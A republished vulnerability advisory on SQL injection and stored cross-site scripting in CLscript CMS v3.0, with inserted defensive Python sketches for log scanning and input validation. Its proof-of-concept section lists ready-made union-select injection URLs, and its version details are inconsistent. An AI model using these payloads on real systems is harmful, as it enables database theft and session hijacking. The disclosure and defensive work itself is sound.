Introduction to the multiple vulnerabilities in CLscript CMS v3.0 and how to fix them
Website Construction 2023-02-09 11:10 www.1681989.com Free Website
CLscript CMS v3.0 - Multiple Web Vulnerabilities
Affected version: 8.6
Introduction:
=============
With the professionally developed Classified-Portal CLscript 3.0 can Visitors post Classifieds and
use many new Features. The Classifieds Software is search Engine friendly to gain better Promotion
Aspects at search Engines. The whole Structure is manageable through easy to use Admin Panel.
In developing the Classified Software, we have geared ourselves to the most successful
Classifieds-Sites on the Internet. You can generate real Income from your Classifieds Website.
For more, see the official website
Abstract
=========
Multiple vulnerabilities were discovered in the CLscript v3.0 Content Management System
Affected products:
==================
CLscript COM
Product: CLscript Classified Software v3.0
Technical analysis:
========
1.1
Multiple SQL injections
The vulnerability allows a remote attacker to inject/execute their own SQL commands on the affected
application DBMS. The vulnerabilities are located in the userDetail.php, advertise_detail.php or
land.php files with the bound vulnerable pid, rid and id parameters. Successful exploitation of the
vulnerability results in DBMS, service & application compromise.
Vulnerable File(s):
[+] userDetail.php
[+] advertise_detail.php
[+] land.php
Vulnerable Module(s):
[+] land
[+] pageDetail
[+] enquiry_detail
[+] userDetail
[+] advertise_detail
[+] config_id
Vulnerable Parameter(s):
[+] rID
[+] ID
[+] pID
[+] faq_id
[+] sp_id
[+] config_id
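A detection sketch for the parameters listed above, added here as an example and not part of the advisory or of CLscript: it flags web-server log entries where one of these id parameters carries anything other than a plain integer. The log lines are constructed, and `/interface/` is an assumed stand-in for the advisory's `[INTERFACE]` placeholder.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names as injectable; each should carry a plain integer id.
# parentId is added because it appears in the advisory's PoC list.
NUMERIC_PARAMS = {"pid", "rid", "id", "faq_id", "sp_id", "config_id", "parentid"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP range).
# "/interface/" stands in for the advisory's [INTERFACE] placeholder.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2023:10:00:00 +0000] "GET /interface/userDetail.php?id=487 HTTP/1.1" 200 5120
192.0.2.44 - - [01/Jan/2023:10:00:05 +0000] "GET /interface/land.php?file=edit_config&config_id=1'+order+by+1--%20- HTTP/1.1" 200 812
192.0.2.44 - - [01/Jan/2023:10:00:09 +0000] "GET /interface/pageDetail.php?pid=5' HTTP/1.1" 500 310
192.0.2.10 - - [01/Jan/2023:10:01:00 +0000] "GET /interface/land.php?file=edit_faq&faq_id=24 HTTP/1.1" 200 2048
""".splitlines()


def suspicious_params(url):
    """Return (name, decoded value) pairs where an id parameter is not a plain integer."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name.lower() in NUMERIC_PARAMS and not re.fullmatch(r"\d{1,10}", value):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Return (client_ip, path, hits) for every request with a malformed id parameter."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand
        hits = suspicious_params(match.group(1))
        if hits:
            findings.append((line.split()[0], urlsplit(match.group(1)).path, hits))
    return findings


if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(ip, path, hits)
```

The same integer check applied server-side before the query is built, together with bound query parameters, removes the injection point; the log scan only shows where it has been probed.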
1.2
Multiple persistent input validation vulnerabilities are detected in the CLscript v3.0 Content Management System.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
The input validation vulnerabilities are located in the topic, new word, subcategories, add a new help, add currency
or add new FAQs modules. Remote attackers can inject script code into the vulnerable modules by injecting malicious
tags as titles, descriptions, word names, category names, currency code or as questions. Successful exploitation
of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation.
Exploitation requires low user interaction & a privileged user account.
Vulnerable Module(s):
[+] Topic
[+] New word
[+] Subcategory
[+] Add a new help
[+] Add currency (Symbol - Currency code)
[+] Add new FAQ (Question)
Vulnerable Parameter(s):
[+] (title - description)
[+] (word name)
[+] (category name)
[+] (name)
[+] (symbol - currency code)
[+] (question)
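A mitigation sketch for the fields listed above, added here as an example and not taken from the advisory or from CLscript's code: structured fields are checked against an allowlist before storage, and every stored value is HTML-encoded when rendered. The field names and the allowlist patterns are assumptions; the page does not give the application's real constraints.

```python
import html
import re

# Assumed allowlist rules for the structured fields the advisory names.
FIELD_RULES = {
    "currency_code": re.compile(r"[A-Z]{3}"),
    "symbol": re.compile(r"[^\s<>\"'&]{1,4}"),
    "word_name": re.compile(r"[\w\- ]{1,64}"),
    "category_name": re.compile(r"[\w\-,. ]{1,80}"),
}
# Free-text fields cannot be allowlisted by shape; they rely on output encoding.
FREE_TEXT = {"title", "description", "name", "question"}
CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f]")


def validate(field, value):
    """Return True if value may be stored in the given field."""
    if field in FIELD_RULES:
        return FIELD_RULES[field].fullmatch(value) is not None
    if field in FREE_TEXT:
        return 0 < len(value) <= 2000 and not CONTROL_CHARS.search(value)
    return False  # unknown field: fail closed


def render_row(record):
    """Build an HTML table row, encoding every stored value at output time."""
    cells = "".join(
        f"<td>{html.escape(str(value), quote=True)}</td>" for value in record.values()
    )
    return f"<tr>{cells}</tr>"


if __name__ == "__main__":
    # Constructed sample record: markup in a free-text field is stored as
    # typed but can only ever be displayed as text.
    record = {"title": "<b>Used cars</b>", "currency_code": "EUR"}
    print(all(validate(f, v) for f, v in record.items()))
    print(render_row(record))
```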
Proof of concept:
=================
1.1
The SQL injection vulnerabilities can be exploited by remote attackers without privileged user accounts or user interaction.
For demonstration or reproduce ...
PoC:
http:// /[INTERFACE]/land.php?file=edit_config&config_id=1'+order+by+1--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=edit_config&config_id=-1'+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/pageDetail.php?pid=-1'+union+select+1,version(),3,4,5,6,7--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=edit_diycontent&pid=5'[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/enquiry_detail.php?rID=-20'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=add_edit_spam_words&sp_id=45'[SQL-INJECTION!]
http:// /[INTERFACE]/land.php?file=catalog&parentId=608[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/userDetail.php?id=487[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/advertise_detail.php?id=77[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=edit_faq&faq_id=24[SQL-INJECTION!]
1.2
The persistent input validation vulnerabilities can be exploited by remote attackers with local low privileged user accounts and
with low required user interaction. For demonstration or reproduce ...
PoC:
1) http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_forum -
create topic (title - description is injectable)
2) http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_spam_words -
add a new word (word is injectable)
3) http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=catalog&parentId=608 -
add subcategory (category name is injectable)
4) http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_help -
add a new help
5) http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_currencie -
Add currency (Symbol - Currency code is injectable)
6) http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_faq -
add new FAQ (Question is injectable)
Risk
=====
1.1
The security risk of the SQL injection vulnerabilities is estimated as critical.
1.2
The security risk of the persistent input validation vulnerabilities is estimated as medium(+).
--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: .vulnerability-lab.
Mail: research@vulnerability-lab.